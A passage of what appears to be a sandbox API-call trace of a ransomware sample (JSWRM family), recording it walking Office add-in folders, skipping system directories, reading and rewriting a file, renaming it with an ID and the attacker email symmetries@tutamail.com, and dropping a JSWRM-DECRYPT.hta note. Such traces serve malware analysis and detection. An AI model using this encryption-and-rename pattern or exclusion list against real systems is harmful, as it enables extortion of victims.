(HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0124.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0124.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0124.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.221] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e310c7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e310c7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9e7d566, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.221] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.222] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.222] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.222] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0124.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0124.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0124.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0124.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.222] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13b67741, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1428e945, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f598, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.hr.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2=".") returned 1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="..") returned 1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="...") returned 1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="windows") returned -1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="recovery") returned -1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="perflogs") returned 1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="documents and settings") returned 1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="system volume information") returned -1 [0124.222] lstrcmpiW (lpString1="PowerViewRes.hr.xap", lpString2="msocache") returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hr.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hr.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.hr.xap", lpUsedDefaultChar=0x0) returned 19 [0124.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hr.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0124.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.hr.xap", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.hr.xap", lpUsedDefaultChar=0x0) returned 19 [0124.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0124.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0124.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0124.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\PowerViewRes.hr.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hr\\powerviewres.hr.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.223] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=325016) returned 1 [0124.223] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.224] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.238] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.238] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.238] CloseHandle (hObject=0x338) returned 1 [0124.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0124.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0124.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0124.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0124.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\PowerViewRes.hr.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hr\\powerviewres.hr.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\PowerViewRes.hr.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hr\\powerviewres.hr.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0124.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.240] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13b67741, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1428e945, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f598, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.hr.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.240] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0124.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0124.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0124.241] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14648313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0124.241] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0124.241] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0124.241] lstrcmpiW (lpString1="hu", lpString2="...") returned 1 [0124.241] lstrcmpiW (lpString1="hu", lpString2="windows") returned -1 [0124.241] lstrcmpiW (lpString1="hu", lpString2="recovery") returned -1 [0124.242] lstrcmpiW (lpString1="hu", lpString2="perflogs") returned -1 [0124.242] lstrcmpiW (lpString1="hu", lpString2="documents and settings") returned 1 [0124.242] lstrcmpiW (lpString1="hu", lpString2="$RECYCLE.BIN") returned 1 [0124.242] lstrcmpiW (lpString1="hu", lpString2="system volume information") returned -1 [0124.242] lstrcmpiW (lpString1="hu", lpString2="msocache") returned -1 [0124.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0124.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0124.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hu\\jswrm-decrypt.hta")) returned 0xffffffff [0124.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0124.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0124.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0124.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0124.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0124.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0124.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.244] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.244] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.245] CloseHandle (hObject=0x314) returned 1 [0124.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0124.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0124.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0124.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0124.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hu\\jswrm-decrypt.hta")) returned 0x20 [0124.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0124.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0124.257] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40b6d79e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231cc0 [0124.257] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.257] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40b6d79e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.257] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.257] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.257] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5eb74f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5eb74f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4c78, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.257] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0124.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241100, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0124.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0124.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0124.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0124.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0124.257] HeapFree 